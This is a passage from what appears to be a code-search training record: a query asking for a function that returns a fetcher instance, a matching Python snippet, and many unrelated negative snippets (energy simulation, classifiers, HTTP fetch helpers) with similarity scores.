bin from 0 to 1\n if np.array(bhv.loc[(bhv.Price_binned==prices_binned[i])&\n (bhv.SOC_binned==1)&\n (bhv.surplus_time=='12h'),'sell'].values):#if sell\n #surplus_time==12h\n # sell 1 kWh of energy to the community and cover residual load if excess\n #print('12hsell')\n flagsell[i]=1\n store2grid[i] = min(bat_size_p_adj-store2load[i],(inv_size/n_inv-pv2load_dc[i]-store2load[i]), #Power\n kW_dis / n_inv, #Power\n (LevelOfCharge[i-1]) / timestep-store2load[i])# Power; all in DC\n store2inv[i] = (store2load[i]+store2grid[i]) # DC\n else: # no sell then cover only res_load\n #print('out12h')\n store2inv[i] = (store2load[i]+store2grid[i]) #DC\n \n else: \n try:\n \n if np.array(bhv.loc[(bhv.Price_binned==prices_binned[i])&\n (bhv.SOC_binned==np.digitize(LevelOfCharge[i-1],bins=bins_soc))&\n (bhv.surplus_time=='12h+'),'sell'].values):#if sell\n #surplus_time==12h+\n # sell 1 kWh of energy to the community and cover residual load if excess \n flagsell[i]=2\n store2grid[i] = min(bat_size_p_adj-store2load[i],(inv_size/n_inv-pv2load_dc[i]-store2load[i]), #Power\n kW_dis / n_inv, #Power\n (LevelOfCharge[i-1]) / timestep-store2load[i])# Power; all in DC\n store2inv[i] = (store2load[i]+store2grid[i]) # DC\n\n # here should take into account whether the prosumer desires to sell or not according to his preferences (SOC,price)\n else: # no sell then cover only res_load\n #print('out12h+')\n store2inv[i] = (store2load[i]+store2grid[i]) #DC\n except Exception as e:\n # Ugly but provisional SOC bin from 0 to 1\n if np.array(bhv.loc[(bhv.Price_binned==prices_binned[i])&\n (bhv.SOC_binned==1)&\n (bhv.surplus_time=='12h+'),'sell'].values):#if sell\n #surplus_time==12h\n # sell 1 kWh of energy to the community and cover residual load if excess\n #print('12hsell')\n flagsell[i]=1\n store2grid[i] = min(bat_size_p_adj-store2load[i],(inv_size/n_inv-pv2load_dc[i]-store2load[i]), #Power\n kW_dis / n_inv, #Power\n (LevelOfCharge[i-1]) / timestep-store2load[i])# Power; all in DC\n store2inv[i] = (store2load[i]+store2grid[i]) # DC\n else: # no sell then cover only res_load\n #print('out12h')\n store2inv[i] = (store2load[i]+store2grid[i]) #DC\n #SOC\n LevelOfCharge[i] = min(LevelOfCharge[i-1] - (store2inv[i] - pv2store[i]*n_bat ) * timestep, # DC\n bat_size_e_adj)#modif to original, store2inv=pv2store*n_bat\n\n pv2grid_dc=np.array([pv-pv2store,inv_array]).min(axis=0)-pv2load_dc # DC\n pv2inv= (pv2grid_dc+pv2load_dc)*n_inv # AC\n inv2curt=pv-pv2grid_dc-pv2load_dc-pv2store # DC\n\n inv2load = (pv2load_dc + store2load) * n_inv # AC\n inv2grid = (pv2grid_dc+store2grid) * n_inv # AC\n grid2load = demand - inv2load # AC\n #MaxDischarge = np.minimum(LevelOfCharge[i-1]*BatteryEfficiency/timestep,MaxPower)\n batt_losses=pv2store*(1-n_bat)\n inv_losses=(pv2grid_dc+pv2load_dc+store2inv)*(1-n_inv)\n \n out = {'pv2inv': pv2inv, # AC\n 'res_pv':res_pv, # DC\n 'pv2store': pv2store, # DC\n 'inv2load': inv2load, # AC\n 'grid2load': grid2load, # AC\n 'store2inv': store2inv, # DC\n 'inv2curt':inv2curt, # DC\n 'LevelOfCharge': LevelOfCharge, # kWh\n 'inv2grid': inv2grid, # AC\n 'inv_losses':inv_losses,\n 'batt_losses':batt_losses,\n 'flag_sell':flagsell,\n 'flag_12h':flag_12h, \n 'store2grid':store2grid*n_inv, # AC\n 'store2load':store2load*n_inv # AC\n \n }\n if not return_series:\n out_pd = {}\n for k, v in out.items(): # Create dictionary of pandas series with same index as the input pv\n out_pd[k] = pd.Series(v, index=pv.index)\n out = out_pd\n \n return out", "def implied_discount_factor(p1: Instrument, c1: Instrument, p2: Instrument, c2: Instrument) -> float:\n return (c1.price - p1.price - c2.price + p2.price)/ (c2.strike - c1.strike)", "def update_profit(self):\n # Acessing Redis can cause greenlet switches because new jobs. We don't\n # want to potentially switch jobs multiple times quickly, so we update\n # the profitability information all at once after the loop to avoid\n # multiple network switches\n new_price_data = {}\n for manager in self.jobmanagers.itervalues():\n currency = manager.config['currency']\n pscore = self.redis.get(\"{}_profit\".format(currency))\n\n # Deserialize\n if pscore:\n try:\n pscore = simplejson.loads(pscore, use_decimal=True)\n except Exception:\n self.logger.warn(\n \"Error parsing profit score for {}! Setting it to 0..\"\n .format(currency))\n pscore = 0\n pass\n # If no score was grabbed, pass a 0 value score\n else:\n self.logger.warn(\"Unable to grab profit info for {}!\"\n .format(currency))\n pscore = 0\n\n ratio = self.redis.get(\"{}_ratio\".format(currency)) or 1.0\n ratio = float(ratio)\n\n # Only set updated if it actually changed\n if self.price_data[currency][0] != pscore or self.price_data[currency][1] != ratio:\n new_price_data[currency] = (pscore, ratio, time.time())\n\n # If we have some new information, adjust accordingly\n if new_price_data:\n self.logger.info(\"Updated price information for {}\"\n .format(new_price_data.keys()))\n # Atomic update in gevent\n self.price_data.update(new_price_data)\n\n # Update all the profit info. No preemption, just maths\n for currency in self.jobmanagers.iterkeys():\n self.update_profitability(currency)\n\n self.logger.debug(\n \"Re-checking best network after new price data for {}\"\n .format(new_price_data.keys()))\n self.check_best()", "def preprocessing(df, product_number):\n useless_columns = ['Customers', 'Category', 'Segment', 'Regione', 'Provincia', 'Channel']\n df = df.drop(df[df.Provincia == '**'].index) # Removing 'Estero'\n for column in useless_columns:\n df = df.drop(column, axis=1)\n df = df_filtered_product(df, product_number) # Choose the number of the product\n df = df.groupby(['Data Rif']).sum().reset_index()\n date_range = pd.date_range('2017-01-02', '2019-03-31', freq='D').to_series()\n week_num = len(date_range) // 7\n index = 0\n\n sales = []\n for week in range(0, week_num):\n STU = 0\n for day in range(0, 7):\n if index == len(df):\n break\n elif date_range[week*7 + day] == df['Data Rif'][index]:\n STU += df['Standard Units'][index]\n index += 1\n sales.append([date_range[week*7], STU])\n df_fin = pd.DataFrame(sales, columns=['Week', 'STU'])\n df_fin.Week = pd.to_datetime(df_fin.Week)\n df_fin.set_index('Week', inplace=True)\n return df_fin", "def classify():\n yes_dataset = df[df[\"_class\"] == 1] # 470588\n no_dataset = df[df[\"_class\"] == 0] # 1971\n\n parameter_analysis = list()\n for criterion in np.arange(0.05, 0.91, 0.05):\n print(\"doing experiment at criterion = %s ...\" % criterion)\n rate_list = list()\n for i in range(10):\n # shuffle yes_dataset and no_dataset, so we can randomly choose 90% yes_dataset\n # + 90% no_dataset as train dataset, 10% yes_dataset + 10% no_dataset as test dataset\n yes_index = yes_dataset.index.tolist()\n random.shuffle(yes_index)\n no_index = no_dataset.index.tolist()\n random.shuffle(no_index)\n \n # concatenate 90%yes + 90%no, 10%yes + 10%no\n train = pd.concat([\n yes_dataset.loc[yes_index[:1774], :],\n no_dataset.loc[no_index[:423530], :]\n ])\n test = pd.concat([\n yes_dataset.loc[yes_index[1774:], :],\n no_dataset.loc[no_index[423530:], :]\n ]) \n \n # split data and label\n train_data, train_label = (train[[\"Revenue.Code\", \n \"Service.Code\", \n \"Procedure.Code\", \n \"Diagnosis.Code\", \n \"Subscriber.Index\"]], \n train[\"_class\"])\n test_data, test_label = (test[[\"Revenue.Code\", \n \"Service.Code\", \n \"Procedure.Code\", \n \"Diagnosis.Code\", \n \"Subscriber.Index\"]], \n test[\"_class\"])\n \n # apply classifier\n clf = GaussianNB()\n clf.fit(train_data, train_label)\n probability = clf.predict_proba(test_data).T[1]\n \n result = pd.DataFrame()\n result[\"_class\"] = test_label\n result[\"_predict\"] = probability >= criterion\n \n result_yes = result[result[\"_class\"] == 1]\n yes_yes_rate = sum(result_yes[\"_class\"] == result_yes[\"_predict\"])/len(result_yes[\"_predict\"])\n \n result_no = result[result[\"_class\"] == 0]\n no_no_rate = sum(result_no[\"_class\"] == result_no[\"_predict\"])/len(result_no[\"_predict\"])\n \n rate_list.append((yes_yes_rate, no_no_rate))\n\n rate_list = pd.DataFrame(rate_list)\n yes_yes_rate, no_no_rate = rate_list.mean()[0], rate_list.mean()[1]\n parameter_analysis.append((criterion, yes_yes_rate, no_no_rate))\n \n # save data to excel spreadsheet\n parameter_analysis = pd.DataFrame(parameter_analysis, columns=[\"criterion\", \"yes_yes_rate\", \"no_no_rate\"])\n writer = pd.ExcelWriter(\"parameter_analysis.xlsx\")\n parameter_analysis.to_excel(writer, \"parameter_analysis\", index=False)\n writer.save()", "def testAggregateDetailedCorrectly(self):\n\tscaler = pf.LinearScaler()\n\tQBp = pf.ProductQuoteBasis(base_price = 1.53, date = dt.datetime(2012,01,01), source = \"P&T\", scaler = scaler, size_basis = uv.UnitVal(100, '1/gal'))\n\tesc = pf.NoEscalationEscalator()\n\tpr1 = pf.Product(name = 'gasoline', description = 'People', quote_basis = QBp, escalator = esc)\n\tpro1 = pf.Production(name = 'stream1', product = pr1, rate = uv.UnitVal(15000, 'gal/hr'), startup_discounter = None, init_date = dt.datetime(2015,01,01))\n\n\tQB = pf.VariableExpenseQuoteBasis(base_price = 0.062, date = dt.datetime(2012,01,01), source = \"P&T\", scaler = scaler, size_basis = uv.UnitVal(100, '1/(kW*hr)'))\n\tvex1 = pf.VariableExpense(name = 'Electricity', description = 'Power consumption by plant', quote_basis = QB, production = pro1, rate = uv.UnitVal(1, 'kW*hr/gal'), escalator = esc)\n\n\tQB2 = pf.VariableExpenseQuoteBasis(base_price = 75, date = dt.datetime(2012,01,01), source= 'Tom Miles', scaler = scaler, size_basis = uv.UnitVal(1, '1/ton'))\n\tvex2 = pf.VariableExpense(name = 'Biomass', description = 'Biomass used by plant', quote_basis = QB2, production = pro1, rate = uv.UnitVal(1.0/150.0, 'ton/gal'), escalator = esc)\n\n\n\tdates = [dt.datetime(2012,01,31), dt.datetime(2013,01,31), dt.datetime(2020, 03, 31), dt.datetime(2021, 12,31)]\n \n\tcosts = pf.VariableCosts()\n costs.add_variable_expense(vex1)\n costs.add_variable_expense(vex2)\n\tcosts.detailed = True\n\tend_date = dt.datetime(2034,12,31)\n costs.build_vex_schedule(end_date)\n\t\n for d in dates:\n self.assertTrue((vex1.schedule['variable_consumption'] == costs.schedule['Electricity_variable_consumption']).all())\n\t self.assertTrue((vex1.schedule['variable_costs'] == costs.schedule['Electricity_variable_costs']).all())\n\t self.assertTrue((vex2.schedule['variable_consumption'] == costs.schedule['Biomass_variable_consumption']).all())\n\t self.assertTrue((vex2.schedule['variable_costs'] == costs.schedule['Biomass_variable_costs']).all())" ]
[ "0.5864486", "0.5679427", "0.55887026", "0.55827385", "0.5496743", "0.5447927", "0.5396345", "0.5391044", "0.5382922", "0.5358451", "0.53466296", "0.53371716", "0.52985895", "0.528991", "0.52696675", "0.52553165", "0.5239735", "0.5239484", "0.5230781", "0.5222127", "0.522195", "0.5221847", "0.52176726", "0.5213727", "0.52087325", "0.52003354", "0.5191661", "0.516923", "0.514408", "0.5135974", "0.51303107", "0.51288533", "0.5120938", "0.5110803", "0.5109255", "0.5107914", "0.5096873", "0.5088177", "0.5068333", "0.506565", "0.50533986", "0.5046693", "0.5029332", "0.50257355", "0.50188357", "0.5008271", "0.50055486", "0.50036544", "0.4998935", "0.49973643", "0.49966025", "0.49917346", "0.49843284", "0.49843276", "0.49790782", "0.49752232", "0.4970256", "0.49526387", "0.4940358", "0.49402878", "0.4938559", "0.49304911", "0.4892052", "0.48848832", "0.48821113", "0.48817983", "0.48806047", "0.48804542", "0.4873827", "0.48735732", "0.4871221", "0.48647738", "0.486116", "0.48590666", "0.48550096", "0.4854773", "0.48506847", "0.4849877", "0.48485437", "0.48446375", "0.48396295", "0.4839204", "0.48328927", "0.48304427", "0.4825914", "0.48216772", "0.48151577", "0.48110935", "0.48047957", "0.48046988", "0.4802432", "0.4801989", "0.48018727", "0.47968838", "0.47958788", "0.47912318", "0.47901857", "0.47897637", "0.47851998", "0.47832692" ]
0.5120163
33
Returns an instance of fetcher
def initialize() -> fetcher.Fetcher: options = fetcher.Input( command="some_cmd", config_file="looker.ini", section="Looker" ) return fetcher.Fetcher(options)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_fetcher(self):\n return self.__fetcher", "def fetch(self) -> Fetch:\n return self._fetch", "def get_fetcher(\n launcher_url: str, output_dir: str, spec: Optional[str] = None\n) -> WorkflowFetcherBase:\n parsed_url = ParsedUrl(launcher_url)\n\n if parsed_url.scheme not in FETCHER_ALLOWED_SCHEMES:\n raise ValueError(\"URL scheme not allowed\")\n\n if spec:\n _, spec_ext = os.path.splitext(spec)\n if spec_ext not in WORKFLOW_SPEC_EXTENSIONS:\n raise ValueError(\n \"The provided specification doesn't have a valid file extension\"\n )\n\n if parsed_url.netloc == \"github.com\":\n return _get_github_fetcher(parsed_url, output_dir, spec)\n elif parsed_url.netloc in FETCHER_ALLOWED_GITLAB_HOSTNAMES:\n return _get_gitlab_fetcher(parsed_url, output_dir, spec)\n elif parsed_url.extension == \".git\":\n return WorkflowFetcherGit(parsed_url, output_dir, spec=spec)\n elif parsed_url.extension == \".zip\":\n return WorkflowFetcherZip(parsed_url, output_dir, spec)\n elif parsed_url.extension in WORKFLOW_SPEC_EXTENSIONS:\n if spec:\n raise ValueError(\n \"Cannot use the 'specification' argument when the URL points directly \"\n \"to a specification file\"\n )\n return WorkflowFetcherYaml(parsed_url, output_dir)\n else:\n raise ValueError(\"Cannot handle given URL\")", "def get_fetcher(tag):\n global FETCHERS\n if not tag in FETCHERS:\n valid_sources = (\", \").join(FETCHERS.keys())\n raise ValueError(\"invalid source name \"\n + \"(current source: {})\".format(valid_sources))\n\n return FETCHERS[tag]", "def pull(self):\n data = api.get(endpoint=self.endpoint, resource_id=self.slug)\n self.__init__(**data)", "async def fetch_async(self) -> FleetInstance:\n\n payload = await self._version.fetch_async(\n method=\"GET\",\n uri=self._uri,\n )\n\n return FleetInstance(\n self._version,\n payload,\n sid=self._solution[\"sid\"],\n )", "def fromurl(cls, url: str):\n return cls.parse_obj(requests.get(url).json())", "def get(cls, fetcher_name_request: str):\n\n\t\tfor i in cls:\n\t\t\tif i.name == fetcher_name_request.upper():\n\t\t\t\treturn i.value\n\t\traise FetcherNotFound(fetcher_name_request)", "def pull(self):\n data = api.get(endpoint=self.endpoint, resource_id=self.id)\n self.__init__(**data)", "async def from_url(cls) -> \"AocPrivateLeaderboard\":\n api_json = await cls.json_from_url()\n return cls.from_json(api_json)", "def get(self):\n # If we have a cache_key, see if there is data under that key\n # in our url cache and use that if there is.\n #\n if self.cache_key and self.cache_key in self.cache:\n return self.cache[self.cache_key]\n\n # If the actual URL is the empty string, and we did not have a cached\n # result for it, then we can not retrieve anything. Return None.\n #\n if self.url is None or len(self.url) == 0:\n return None\n\n if not self.use_post:\n # If we are NOT using 'POST' to query the URL we can create a\n # simple urllib2.Request object.\n #\n req = urllib2.Request(self.url)\n else:\n # If we ARE using 'POST' then we need to interpret the\n # parameters out of the URL and pass them as the 'data'\n # parameter to the request object we are creating. This will\n # cause 'urlopen()' to use POST to get the results.\n #\n o = urlparse.urlsplit(self.url)\n req = urllib2.Request(o.scheme + \"://\" + o.netloc + o.path, o.query)\n\n # If 'spoof_url' is NOT None, then we\n # want our request to use the 'spoof_url' as its referrer\n #\n if self.spoof_url is not None:\n req.add_header('Referer', self.spoof_url)\n\n # What we get from the remote site is UTF-8 so decode it in to unicode\n # and then encode that as ASCII with characters that can not be\n # represented in ASCII replaced with their XML character references.\n #\n f = urllib2.urlopen(req)\n content_type = f.info()['Content-Type'].lower()\n\n # Based on the content type we need to deal with the response\n # in various ways, like unzip, or re-encoding as ascii.\n #\n if content_type == \"application/zip\":\n # In zip files we extract all the individual files.\n #\n # NOTE: Since the zipfile.ZipFile class needs a file like object\n # with the 'seek()' method we use a StringIO to hold\n # our url result data.\n #\n result = []\n stringy = StringIO(f.read())\n z = zipfile.ZipFile(stringy, 'r')\n members = z.namelist()\n for member in members:\n result.append(z.read(member))\n z.close()\n stringy.close()\n\n # The way the scraper wants to work is that it gets all parts\n # of such a zip file as a single string.. so join them all\n # together (separated by a newline character, just because.)\n #\n result = \"\\n\".join(result)\n elif content_type[0:9] == \"text/xml;\":\n ign,charset = content_type.split('=')\n\n # XXX We should just return what we get and not encode it as\n # ascii. The end point should encode if it only wants to\n # see a string... (or maybe we SHOULD do this..)\n #\n result = f.read().decode(charset).encode(\"ascii\",\n \"xmlcharrefreplace\")\n else:\n # Finally we do not know what to do with it.. just read it\n # in to a string.\n #\n result = f.read()\n\n f.close()\n if self.cache_key:\n self.cache[self.cache_key] = result\n return result", "def get_instance():\n if not Cache.__instance__:\n Cache.__instance__ = Cache(config('REDIS_HOST'), config('REDIS_PORT'))\n return Cache.__instance__", "def _get_github_fetcher(\n parsed_url: ParsedUrl, output_dir: str, spec: Optional[str] = None\n) -> WorkflowFetcherBase:\n # There are four different GitHub URLs we are interested in:\n # 1. URL to a repository: /<user>/<repo>\n # 2. Git URL: /<user>/<repo>.git\n # 3. URL to a branch/commit/tag: /<user>/<repo>/tree/<git_ref>\n # 4. URL to a zip snapshot: /<user>/<repo>/archive/.../<git_ref>.zip\n components = _match_url(\n parsed_url,\n [\n \"/<username>/<repository>/\",\n \"/<username>/<repository>.git/\",\n \"/<username>/<repository>/tree/<path:git_ref>\",\n \"/<username>/<repository>/archive/<path:zip_path>\",\n ],\n )\n\n username = components[\"username\"]\n repository = components[\"repository\"]\n git_ref = components.get(\"git_ref\")\n zip_path = components.get(\"zip_path\")\n\n if zip_path:\n # The name of the zip file is the git commit/branch/tag\n git_ref = parsed_url.basename_without_extension\n workflow_name = f\"{repository}-{git_ref}\"\n return WorkflowFetcherZip(parsed_url, output_dir, spec, workflow_name)\n else:\n repository_url = ParsedUrl(f\"https://github.com/{username}/{repository}.git\")\n return WorkflowFetcherGit(repository_url, output_dir, git_ref, spec)", "def _get_gitlab_fetcher(\n parsed_url: ParsedUrl, output_dir: str, spec: Optional[str] = None\n) -> WorkflowFetcherBase:\n # There are four different GitLab URLs we are interested in:\n # 1. URL to a repository: /<user>/<repo>\n # 2. Git URL: /<user>/<repo>.git\n # 3. URL to a branch/commit/tag: /<user>/<repo>/-/tree/<git_ref>\n # 4. URL to a zip snapshot: /<user>/<repo>/-/archive/.../<repo>-<git_ref>.zip\n # Note that GitLab supports recursive subgroups, so <user> can contain slashes\n components = _match_url(\n parsed_url,\n [\n \"/<path:username>/<repository>/\",\n \"/<path:username>/<repository>.git/\",\n \"/<path:username>/<repository>/-/tree/<path:git_ref>\",\n \"/<path:username>/<repository>/-/archive/<path:zip_path>\",\n ],\n )\n\n username = components[\"username\"]\n repository = components[\"repository\"]\n git_ref = components.get(\"git_ref\")\n zip_path = components.get(\"zip_path\")\n\n if zip_path:\n # The name of the zip file is composed of the repository name and\n # the git commit/branch/tag\n workflow_name = parsed_url.basename_without_extension\n return WorkflowFetcherZip(parsed_url, output_dir, spec, workflow_name)\n else:\n repository_url = ParsedUrl(\n f\"https://{parsed_url.hostname}/{username}/{repository}.git\"\n )\n return WorkflowFetcherGit(repository_url, output_dir, git_ref, spec)", "def __init__(self, context=None):\r\n self._org_url = PARAMS['BB_ORG_FETCHER_URL']\r\n self._cached_metadata = defaultdict(dict)\r\n self._remote_cache_timestamp = None\r\n self._bb_request_time_limit = int(PARAMS[\"BB_REQUEST_TIME_LIMIT\"])\r\n\r\n try:\r\n context_key = PARAMS['FOUNDATION'].split('-')[1][:3]\r\n self._context = context or self._context_map[context_key]\r\n except KeyError:\r\n if context_key not in self._unmapped_contexts:\r\n LOGGER.error(\"Can't map foundation %s\", context_key)\r\n raise InvalidFoundation\r\n else:\r\n self._context = None\r\n\r\n if self._context:\r\n available_contexts = self._context_list()\r\n if not available_contexts \\\r\n or self._context not in available_contexts:\r\n LOGGER.error(\"Context %s (foundation %s) not in context list %s\",\r\n self._context,\r\n PARAMS['FOUNDATION'],\r\n ','.join(available_contexts) if available_contexts\r\n else \"(no contexts)\")\r\n raise ContextNotAvailable\r\n\r\n LOGGER.info(\"Initialize fetcher (context(s): %s)\", self._context)\r\n super().__init__()", "def _fetch(cls, *args, **kwargs):\n apikey = htpc.settings.get('plexpy_apikey')\n\n if apikey is None:\n raise\n\n url = '%sapi/v2?apikey=%s&%s' % (cls._build_url(), apikey, urlencode(kwargs))\n\n try:\n r = requests.get(url, verify=False)\n r.raise_for_status()\n # Lets just copy the headers for now.\n cherrypy.response.headers['Content-Type'] = r.headers.get('Content-Type', 'application/json;charset=UTF-8')\n resp = r.json()\n if resp.get('response', {}).get('result') == 'success':\n return resp['response']['data']\n except:\n log.exception('Failed to get %s' % url)\n return", "def parse(self):\n \n r = requests.get(self.url)\n if r:\n self.title = fetch_title(self.url)\n self.domain = self.fetch_domain()\n self.favicon = self.fetch_favicon()\n self.topics = self.classify_topics()\n self.description = self.fetch_description()\n return self", "def Fetch(self, request, global_params=None):\n config = self.GetMethodConfig('Fetch')\n return self._RunMethod(\n config, request, global_params=global_params)", "def from_crawler(cls, crawler):\n return cls.from_settings(crawler.settings)", "def get_instance(self, name):\n klass = self.get_class(name)\n return klass()", "def get(self):\n return self.handler(url=self.url)", "def load(cls):\n\n try:\n return cls.objects.get()\n except cls.DoesNotExist:\n return cls()", "def __get__(self, instance, owner):\n if instance._location is None:\n raise AttributeError('Cannot find URL of %s relative to URL-less %s' % (self.cls.__name__, owner.__name__))\n newurl = join(instance._location, self.api_name)\n obj = self.cls.get(newurl, auth=instance.auth)\n obj.auth = instance.auth\n return obj", "def _get(self, url):\n return self._request(url)", "def fetch(self, remote, *args):\n return self.cmd('fetch', remote, *args)", "def fetch(self, endpoint: str, query: str = None, protocol: str = protocol,\n host: str = host) -> Response:\n\n # overwrite the class attributes to custom values provided by the method's arguments\n self.endpoint = endpoint\n self.query = query\n self.protocol = protocol\n self.host = host\n\n # concatenate arguments to URL and save as attribute\n self.URL = f'{protocol}://{host}{endpoint}{query}'\n\n logger.debug(f'Fetching from API: {self.URL}')\n ret = requests.get(self.URL)\n logger.debug(f'Returning from API: {ret} {ret.content}')\n return ret", "def fetch(cls, url):\n delta = time.time() - cls._time_last_fetched\n wait_time = TIME_TIL_RETRY - delta\n if wait_time > 0:\n time.sleep(wait_time)\n resp = requests.get(url)\n cls._time_last_fetched = time.time()\n resp.raise_for_status()\n return resp", "def _get_one(self,url):\n pass", "def _get_instance(self):", "def _get_instance(self):", "def get_instance():\n if Classifier.__instance is None:\n Classifier()\n return Classifier.__instance", "def get_instance(cls):\n return cls.__new__(cls)", "def get_instance(cls):\n return cls.__new__(cls)", "def get_instance(cls):\n return cls.__new__(cls)", "def fetch(self):\n # This method also sets self._results_filtered and\n # self._urltable.\n page = self._conn.fetch_page(self._ddg_url.relative())\n\n if logger.isEnabledFor(logging.DEBUG):\n import tempfile\n fd, tmpfile = tempfile.mkstemp(prefix='ddgr-response-')\n os.close(fd)\n with open(tmpfile, 'w', encoding='utf-8') as fp:\n fp.write(page)\n logger.debug(\"Response body written to '%s'.\", tmpfile)\n\n parser = DdgParser(news=self._ddg_url.news)\n parser.feed(page)\n\n self.results = parser.results\n self._results_filtered = parser.filtered\n self._urltable = {}\n for r in self.results:\n self._urltable.update(r.urltable())", "def get_instance(cls, *args, **kwargs):\n if cls._instance is not None:\n return cls._instance\n return cls(*args, **kwargs)", "def getInstance(cls):\n cls.locker.acquire()\n try:\n if not cls.instance:\n cls.instance = cls()\n return cls.instance\n finally:\n cls.locker.release()", "def getResource(self, url):\n\n res = self.getRequest(url)\n return self._instantiateResource(res)", "def __call__(self, *args, **kwargs):\n return self.fetch(*args, **kwargs)", "def fetch(self):\n if not self.__class__.handler:\n raise IcebergNoHandlerError()\n\n data = self.__class__.handler.request(self.resource_uri)\n\n return self._load_attributes_from_response(**data)", "async def fetch_async(self) -> WorkflowInstance:\n\n payload = await self._version.fetch_async(\n method=\"GET\",\n uri=self._uri,\n )\n\n return WorkflowInstance(\n self._version,\n payload,\n workspace_sid=self._solution[\"workspace_sid\"],\n sid=self._solution[\"sid\"],\n )", "def _get_soup_object(url: str) -> bs4.BeautifulSoup:\n request_result=requests.get(url)\n soup = bs4.BeautifulSoup(request_result.text, \"html.parser\")\n return soup", "def return_instance(cls):\n return cls()", "def getRedditInstance():\r\n\r\n return praw.Reddit(client_id=REDDIT_CLIENT_ID,\r\n client_secret=REDDIT_CLIENT_SECRET,\r\n user_agent=REDDIT_USER_AGENT)", "def get_feed_fetcher(cls, cskey, fsid, topic_keys):\n if len(topic_keys) != 1:\n return None\n topic_key = topic_keys[0]\n topic = Topic.get_by_topic_key(topic_key)\n required_keywords, feed_url = FeedSourceConfig.get_matched_custom_feed(fsid, topic.name) \n return cls(cskey, fsid, required_keywords, feed_url) if feed_url else None", "def get_instance(self):\n try:\n return self._instance\n except AttributeError:\n self._instance = self._decorated()\n return self._instance", "def fetch(self):\n try:\n self.__genre = 'review'\n self.__baseuri = 'http://ehealthforum.com'\n self.__setSoupForCurrentUri()\n \n if not re.search('\\d+\\.html$', self.currenturi):\n return self.__createTasksForThreads()\n else:\n return self.__addThreadAndPosts()\n except:\n log.exception(self.log_msg('Exception in fetch for the url %s'%self.currenturi))\n return False", "def _create_instance(cls, configuration, auth_type):\n auth = ClientAuthFactory.get(\n username=configuration.username,\n password=configuration.password,\n auth_type=auth_type\n )\n instance = HttpClient(configuration.url, auth)\n cls._INSTANCES[configuration] = instance\n return instance", "def open(self, url, conn_timeout=None, **kw):\r\n url = self.maybe_local_url(url)\r\n with TRACER.timed('Fetching %s' % url, V=1):\r\n if not self.reachable(url, conn_timeout=conn_timeout):\r\n raise FetchError('Could not reach %s within deadline.' % url)\r\n try:\r\n return urllib_request.urlopen(url, **kw)\r\n except (urllib_error.URLError, HTTPException) as exc:\r\n raise FetchError(exc)", "def refresh(self) -> object:\n requestor = Requestor(local_api_key=self._api_key)\n url = self.instance_url()\n response, api_key = requestor.request(method=RequestMethod.GET, url=url, params=self._retrieve_params)\n self.refresh_from(values=response, api_key=api_key)\n return self", "def fetch_object(url):\n print(' GET ' + url)\n session = requests.Session()\n retry = Retry(connect=3, backoff_factor=15)\n adapter = HTTPAdapter(max_retries=retry)\n session.mount('http://', adapter)\n session.mount('https://', adapter)\n r = session.get(url)\n # Covering internal server errors by retrying one more time\n if r.status_code == 500:\n time.sleep(5)\n r = requests.get(url, allow_redirects=True)\n elif r.status_code != 200:\n print(f\"Problem with request: {str(r)}\")\n raise RuntimeError(\"Non-200 status code\")\n return r", "async def fetch_repository(self, name: str) -> \"Repository\":\n\n # prevent cyclic imports\n from github.objects import Repository\n\n data = await self.http.fetch_repository(self.login, name)\n return Repository.from_data(data, self.http)", "def __init__(self, mode: str = \"\", src: str = \"\", ds: str = \"\", **fetcher_kwargs):\n\n # Facade options:\n self._mode = OPTIONS[\"mode\"] if mode == \"\" else mode\n self._dataset_id = OPTIONS[\"dataset\"] if ds == \"\" else ds\n self._src = OPTIONS[\"src\"] if src == \"\" else src\n\n _VALIDATORS[\"mode\"](self._mode)\n _VALIDATORS[\"src\"](self._src)\n _VALIDATORS[\"dataset\"](self._dataset_id)\n\n # Load data source access points:\n if self._src not in AVAILABLE_DATA_SOURCES:\n raise InvalidFetcher(\n \"Requested data fetcher '%s' not available ! Please try again with any of: %s\"\n % (self._src, \"\\n\".join(AVAILABLE_DATA_SOURCES))\n )\n else:\n Fetchers = AVAILABLE_DATA_SOURCES[self._src]\n\n # Auto-discovery of access points for this fetcher:\n # rq: Access point names for the facade are not the same as the access point of fetchers\n self.Fetchers = {}\n self.valid_access_points = []\n for p in Fetchers.access_points:\n if p == \"box\": # Required for 'region'\n self.Fetchers[\"region\"] = Fetchers.Fetch_box\n self.valid_access_points.append(\"region\")\n if p == \"wmo\": # Required for 'profile' and 'float'\n self.Fetchers[\"float\"] = Fetchers.Fetch_wmo\n self.valid_access_points.append(\"float\")\n self.Fetchers[\"profile\"] = Fetchers.Fetch_wmo\n self.valid_access_points.append(\"profile\")\n\n # Init sub-methods:\n self.fetcher = None\n if self._dataset_id not in Fetchers.dataset_ids:\n raise ValueError(\n \"%s dataset is not available for this data source (%s)\"\n % (self._dataset_id, self._src)\n )\n self.fetcher_kwargs = {**fetcher_kwargs}\n self.fetcher_options = {**{\"ds\": self._dataset_id}, **fetcher_kwargs}\n self.postproccessor = self.__empty_processor\n self._AccessPoint = None\n\n # Init data structure holders:\n self._index = None\n self._data = None\n\n # Dev warnings\n # Todo Clean-up before each release\n if self._dataset_id == \"bgc\" and self._mode == \"standard\":\n warnings.warn(\n \"'BGC' dataset fetching in 'standard' user mode is not reliable. \"\n \"Try to switch to 'expert' mode if you encounter errors.\"\n )", "def fetch_url_feed(self, url, **args):\n return self.fetch(\"/url\", url=url, **args)", "def get_from_uri(self, url, skip_cache=False, *args, **kwargs):\n\n cleaned_url = handle_slash(url, self.model._meta['add_slash'])\n\n if skip_cache:\n cached_response = None\n else:\n cached_response = self.get_from_cache('GET', cleaned_url)\n\n if cached_response:\n response = cached_response\n else:\n response = self._request('GET', cleaned_url, *args, **kwargs)\n\n self.validate_get_response(response)\n self.handle_get_response(response)\n\n # should this be handled by handle_get_response? i think probably.\n obj = self.obj_from_response(response)\n\n obj._full_url = cleaned_url\n\n return obj", "def get_cache_instance ( ):\n cache_strategy_instance = SimpleCacheStrategy ( )\n cache_strategy_instance.apply_cache_strategy ( threshold=50, default_timeout=100 )\n return cache_strategy_instance", "def __init__(self, url=URL):\n self.entries = feedparser.parse(url).entries", "def _get(self, components, picker, **params):\n url = '/'.join((self.base,) + components)\n\n headers = {\"Authorization\": \"Token token=\" + self._token}\n\n params['page'] = params.get('page') or self.page\n params['per_page'] = params.get('per_page') or self.per_page\n\n r = requests.get(\".\".join([url, self.format]),\n params=params,\n headers=headers)\n\n _next = 